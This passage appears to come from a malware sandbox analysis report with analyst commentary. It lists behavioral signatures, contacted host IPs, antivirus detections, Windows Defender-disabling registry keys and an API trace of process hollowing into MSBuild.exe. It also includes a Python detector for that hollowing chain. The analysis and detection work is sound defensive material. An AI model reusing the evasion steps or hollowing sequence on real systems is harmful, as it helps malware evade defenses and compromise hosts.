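                         [b".text", b".rdata", b".data", b".rsrc"], rich=True),
    "delphi_x86": build_pe(0x014C, b"This program must be run under Win32",
                           [b"CODE", b"DATA", b"BSS", b".idata", b".tls", b".rdata", b".reloc", b".rsrc"]),
    "msvc_x64": build_pe(0x8664, b"This program cannot be run in DOS mode.",
                         [b".text", b".rdata", b".data", b".pdata", b".rsrc"], pe32plus=True, rich=True),
    "ip_lookup": b'{"ip":"203.0.113.7","country":"US"}',   # a JSON reply, for contrast
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, sniff_pe(data))
    print("executables:", executable_downloads(SAMPLES))
```

Run over a real capture, the buffer would be the first read of each request_handle; a downloader that fetches several PE32 and PE32+ images from an HTTP session, as this one does, stands out even before any of them is written to disk.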
section .vmpx\xc2\xbd\xc2 (name contains non-printable bytes) virtual_address 0x002a1000 virtual_size 0x00314e8c size_of_data 0x00315000 entropy 7.93461845762 description A section with a high entropy has been found
entropy 0.938587360595 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated
LookupPrivilegeValueW  system_name=(empty)  privilege_name=SeDebugPrivilege  | status 1, return 1, repeated 0
url http://www.winimage.com/zLibDll
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Steal credential rule local_credential_Steal
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
section .vmpx\xc2\xbd\xc2 description Section name indicates VMProtect
host 149.88.76.85
host 176.111.174.109
host 147.45.47.149
host 185.172.128.159
host 185.172.128.69
host 5.42.66.10
host 5.42.99.177
host 91.202.233.232
host 94.232.45.38
host 5.42.65.116
Time & API Arguments Status Return Repeated
NtAllocateVirtualMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00400000  region_size=1662976  allocation_type=12288 (MEM_COMMIT|MEM_RESERVE)  protection=64 (PAGE_EXECUTE_READWRITE)  heap_dep_bypass=0  stack_dep_bypass=0  stack_pivoted=0  | status 1, return 0, repeated 0
registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
wmi Select * From AntiVirusProduct
Time & API Arguments Status Return Repeated
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00400000  | status 1, return 1, repeated 0
  buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0xfffde008  buffer=@  | status 1, return 1, repeated 0
Time & API Arguments Status Return Repeated
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00400000  | status 1, return 1, repeated 0
  buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
Vendor        Detection
Bkav          W64.AIDetectMalware
Lionic        Virus.Generic.AI.1!c
Elastic       malicious (high confidence)
Skyhigh       BehavesLike.Win64.Generic.wc
Cylance       Unsafe
Symantec      ML.Attribute.HighConfidence
ESET-NOD32    a variant of Win64/GenKryptik.GVXA
APEX          Malicious
McAfeeD       ti!2D8524C8B315
FireEye       Generic.mg.9905d4c0f3aaf44c
Gridinsoft    Trojan.Heur!.02210683
DeepInstinct  MALICIOUS
SentinelOne   Static AI - Suspicious PE
CrowdStrike   win/malicious_confidence_100% (D)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 2816 called NtSetContextThread to modify thread in remote process 2876
Time & API Arguments Status Return Repeated
NtSetContextThread  thread_handle=0x00000260  process_identifier=2876  registers: eax=4406637 (0x00433d6d)  ebx=-139264 (0xfffde000 as an unsigned 32-bit value)  eip=0 esp=0 edi=0 ebp=0 edx=0 esi=0 ecx=0  | status 1, return 0, repeated 0
Process injection Process 2816 resumed a thread in remote process 2876
Time & API Arguments Status Return Repeated
NtResumeThread  thread_handle=0x00000260  suspend_count=1  process_identifier=2876  | status 1, return 0, repeated 0
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CC61DA73-D048-4B71-95C6-F85859FFF9EA}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
Time & API Arguments Status Return Repeated
(one call per line, in trace order; the trailing triple is status, return, repeated)

NtResumeThread  thread_handle=0x00000000000003c0  suspend_count=1  process_identifier=2364  | 1 0 0
CreateProcessInternalW  command_line=C:\Users\test22\Documents\SimpleAdobe\o_CeSdAw1K73YQlvgMMzEXT2.exe  filepath=(empty)  filepath_r=(empty)  current_directory=(empty)  thread_identifier=2820  thread_handle=0x00000000000006b8  process_identifier=2816  process_handle=0x0000000000000604  creation_flags=0 ()  inherit_handles=0  track=1  stack_pivoted=0  | 1 1 0
NtResumeThread  thread_handle=0x000000dc  suspend_count=1  process_identifier=2816  | 1 0 0
NtResumeThread  thread_handle=0x0000014c  suspend_count=1  process_identifier=2816  | 1 0 0
NtResumeThread  thread_handle=0x00000194  suspend_count=1  process_identifier=2816  | 1 0 0
NtResumeThread  thread_handle=0x00000218  suspend_count=1  process_identifier=2816  | 1 0 0
NtGetContextThread  thread_handle=0x000000e0  | 1 0 0
NtGetContextThread  thread_handle=0x000000e0  | 1 0 0
NtResumeThread  thread_handle=0x000000e0  suspend_count=1  process_identifier=2816  | 1 0 0
NtGetContextThread  thread_handle=0x000000e0  | 1 0 0
NtGetContextThread  thread_handle=0x000000e0  | 1 0 0
NtGetContextThread  thread_handle=0x000000e0  | 1 0 0
NtSetContextThread  thread_handle=0x000000e0  process_identifier=2816  registers: eip=1943939972 (0x73de2b84)  esp=3655520  edi=3655604  eax=2135121321  ebp=3655560  edx=13  ebx=44865660  esi=4  ecx=45583636  | 1 0 0
NtResumeThread  thread_handle=0x000000e0  suspend_count=1  process_identifier=2816  | 1 0 0
CreateProcessInternalW  filepath=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  filepath_r=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  command_line=(empty)  current_directory=(empty)  thread_identifier=2880  thread_handle=0x00000260  process_identifier=2876  process_handle=0x00000264  creation_flags=134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)  inherit_handles=0  track=1  stack_pivoted=0  | 1 1 0
NtGetContextThread  thread_handle=0x00000260  | 1 0 0
NtAllocateVirtualMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00400000  region_size=1662976  allocation_type=12288 (MEM_COMMIT|MEM_RESERVE)  protection=64 (PAGE_EXECUTE_READWRITE)  heap_dep_bypass=0  stack_dep_bypass=0  stack_pivoted=0  | 1 0 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00400000  | 1 1 0
  buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|m=Ð@`@€8 8ÀX˜°8@X@ÐÜœ6@.textÈ»¼ `.rdata2~ЀÀ@@.data0IP2@@À.rsrc8 r@@.relocX˜ÀšŠ@B
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00401000  buffer=(not shown)  | 1 1 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x0055d000  buffer=(not shown)  | 1 1 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x00585000  buffer=(not shown)  | 1 1 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x0058a000  buffer=(not shown)  | 1 1 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0x0058c000  buffer=(not shown)  | 1 1 0
WriteProcessMemory  process_identifier=2876  process_handle=0x00000264  base_address=0xfffde008  buffer=@  | 1 1 0
NtSetContextThread  thread_handle=0x00000260  process_identifier=2876  registers: eax=4406637 (0x00433d6d)  ebx=-139264 (0xfffde000 as an unsigned 32-bit value)  eip=0 esp=0 edi=0 ebp=0 edx=0 esi=0 ecx=0  | 1 0 0
NtResumeThread  thread_handle=0x00000260  suspend_count=1  process_identifier=2876  | 1 0 0

Read together, the last eleven calls are process hollowing of MSBuild.exe: the .NET host is started suspended, a 1662976-byte RWX region is committed at its image base 0x00400000, a PE header (sections .text, .rdata, .data, .rsrc, .reloc) and five section bodies are written into it, the single non-zero byte "@" (0x40) of the little-endian image base 0x00400000 is written at 0xfffde008 (ebx + 8, the ImageBaseAddress field of a 32-bit PEB), the primary thread's eax, which a freshly created 32-bit thread uses as its entry point, is set to 0x00433d6d inside the written image, and the thread is resumed.
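A detector for that chain, written here as an added example and not taken from the sandbox or the sample: it walks a constructed API trace whose values mirror the ones above (caller pid 2816, MSBuild.exe child pid 2876 created with CREATE_SUSPENDED, an RWX allocation at 0x00400000 of 1662976 bytes, an "MZ" write at that base, a write at 0xfffde008, NtSetContextThread with eax 4406637 and ebx -139264, then NtResumeThread) and raises a finding only when every step lands on the same suspended child. It also records whether the new entry point falls inside the written region and whether the ImageBaseAddress slot (ebx + 8 on a 32-bit PEB, the standard initial-thread convention where ebx holds the PEB and eax the entry point) was patched. The event field names, the buffer contents and the second, non-suspended child are this script's own assumptions.

```python
"""Flag process hollowing in a Cuckoo/ZeroBOX-style API trace.

Per suspended child the detector wants the full chain:
  CreateProcessInternalW(CREATE_SUSPENDED) -> NtAllocateVirtualMemory(RWX in child)
  -> WriteProcessMemory(MZ image at that base) -> NtSetContextThread -> NtResumeThread
Added example; the trace below is constructed from the values in the report and the
field names are this script's own, not the sandbox's."""

CREATE_SUSPENDED = 0x00000004
PAGE_EXECUTE_READWRITE = 0x40
PEB_IMAGE_BASE_OFFSET = 8      # PEB.ImageBaseAddress on 32-bit Windows

MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
TRACE = [
    {"api": "CreateProcessInternalW", "pid": 2816, "filepath": MSBUILD,
     "creation_flags": 0x08000004, "child_pid": 2876},          # CREATE_NO_WINDOW|CREATE_SUSPENDED
    {"api": "NtGetContextThread", "pid": 2816, "target_pid": 2876},
    {"api": "NtAllocateVirtualMemory", "pid": 2816, "target_pid": 2876,
     "base": 0x00400000, "size": 1662976, "protection": PAGE_EXECUTE_READWRITE},
    {"api": "WriteProcessMemory", "pid": 2816, "target_pid": 2876, "base": 0x00400000,
     "buffer": b"MZ\x90\x00\x03\x00\x00\x00 ...This program cannot be run in DOS mode."},
    {"api": "WriteProcessMemory", "pid": 2816, "target_pid": 2876, "base": 0x00401000,
     "buffer": b"\x55\x8b\xec"},                                  # a section body
    {"api": "WriteProcessMemory", "pid": 2816, "target_pid": 2876, "base": 0xfffde008,
     "buffer": b"\x00\x00\x40\x00"},                              # new ImageBaseAddress, little-endian
    {"api": "NtSetContextThread", "pid": 2816, "target_pid": 2876,
     "eax": 4406637, "ebx": -139264},                             # entry point, PEB (printed signed)
    {"api": "NtResumeThread", "pid": 2816, "target_pid": 2876},
    # A normal child start for contrast: not suspended, nothing written into it.
    {"api": "CreateProcessInternalW", "pid": 2364, "creation_flags": 0, "child_pid": 2816,
     "filepath": r"C:\Users\test22\Documents\SimpleAdobe\o_CeSdAw1K73YQlvgMMzEXT2.exe"},
    {"api": "NtResumeThread", "pid": 2816, "target_pid": 2816},
]


def detect_hollowing(trace):
    """Return one finding per suspended child that goes through the whole chain."""
    tracked = {}                           # child pid -> what the caller did to it so far
    findings = []
    for ev in trace:
        api = ev["api"]
        if api == "CreateProcessInternalW":
            if ev["creation_flags"] & CREATE_SUSPENDED:
                tracked[ev["child_pid"]] = {"caller": ev["pid"], "image": ev["filepath"],
                                            "rwx": {}, "mz_at": None, "writes": set(),
                                            "ctx": None}
            continue
        st = tracked.get(ev.get("target_pid"))
        if st is None:
            continue                       # not a suspended child we are watching
        if api == "NtAllocateVirtualMemory" and ev["protection"] == PAGE_EXECUTE_READWRITE:
            st["rwx"][ev["base"]] = ev["size"]
        elif api == "WriteProcessMemory":
            st["writes"].add(ev["base"])
            if ev["buffer"][:2] == b"MZ":
                st["mz_at"] = ev["base"]
        elif api == "NtSetContextThread":
            st["ctx"] = ev
        elif api == "NtResumeThread":
            finding = _judge(ev["target_pid"], st)
            if finding:
                findings.append(finding)
            tracked.pop(ev["target_pid"])  # the child is running now, one verdict per start
    return findings


def _judge(child_pid, st):
    """Decide whether what was done to one suspended child amounts to hollowing."""
    base = st["mz_at"]
    if base is None or base not in st["rwx"] or st["ctx"] is None:
        return None
    entry = st["ctx"]["eax"]
    peb = st["ctx"]["ebx"] & 0xFFFFFFFF    # the sandbox prints registers as signed ints
    return {
        "child_pid": child_pid,
        "caller": st["caller"],
        "image": st["image"],
        "injected_base": base,
        "entry_point": entry,
        "entry_in_injected_image": base <= entry < base + st["rwx"][base],
        "peb_image_base_patched": (peb + PEB_IMAGE_BASE_OFFSET) in st["writes"],
    }


if __name__ == "__main__":
    for finding in detect_hollowing(TRACE):
        print({k: (hex(v) if isinstance(v, int) and k.endswith(("base", "point")) else v)
               for k, v in finding.items()})
```

Requiring the resume to close the chain keeps debuggers and installers that only read or set a context out of the findings; the two extra booleans are what an analyst checks next, since an entry point outside the written image or an unpatched PEB usually means a different injection technique rather than a clean hollow.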
dead_host 5.42.65.116:50500
dead_host 147.45.47.149:80
dead_host 192.168.56.103:49178